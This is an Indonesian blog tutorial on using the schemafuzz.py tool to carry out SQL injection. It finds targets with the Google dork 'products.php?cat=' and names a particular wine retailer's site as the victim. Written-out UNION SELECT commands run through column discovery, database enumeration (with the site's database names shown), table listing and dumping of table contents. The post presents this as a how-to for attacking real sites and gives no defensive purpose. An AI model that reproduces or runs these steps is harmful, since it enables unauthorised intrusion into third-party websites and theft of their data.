feature dan hal2 yang di butuhkan yaitu :
1. Komputer
2. Koneksi internet
3. Program Python-2.6.4 ( Kalian bisa donkload softwarenya di sini : Klik Here )
4. Script schemafuzzy.py ( Kalian bisa donkload softwarenya di sini : Klik Here )
5. CMD
6. Target website (misal menggunakan kata kunci di google : “products.php?cat=”) Sudah Di siapkan?
di pastikan Kamu sudah install python2.6.4.
- Copy schemafuzz.py ke dalam dir python26. Kalo sudah selesai langsung jalankan.
Caranya : klik start>>Run>>CMD
terus aktif ke directory c:\ dengan mengetik CD ../.. <– mundur 2 dir
masuk ke directory Python26 dengan cara ketik “cd Python26″ hingga muncul C:\Python26>
Perintah dasar schemafuzzy ini yaitu : schemafuzzy.py -u “target” –perintah
1. kita gunakan di target kita. (disini saya ambil target yang saya dapatkan di google dengan kata kunci : “products.php?cat=”) yaitu :
http://www.queenannewine.com/products.php?cat=1
2. Cek kolomnya
python schemafuzzy.py -u http://www.queenannewine.com/products.php?cat=1 –findcol
3. Setelah ini kamu masuk ke direktory c:\ di mana python terinstall cari name file schemafuzzlog.txt <= di sini ada hasil column yang berhasil di cari tadi
4. Cari DB nya..
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ -dbs
Kita sudah temukan data base site tersebut :
1. C239128_QAWcal
2. C239128_queen
3. C239128_queen2
tapi pada penjesalan ini kita akan gunakan database nomor2
4. Cari nama table dalam database C239128_queen
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –schema -D C239128_queen
5. Exploit Tables and Columns :
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –dump -D C239128_queen -T – di isi Nama table -C di isi nama colum.
Sumber : Cherbond-Cyber4rt
Tidak ada komentar:
Posting Komentar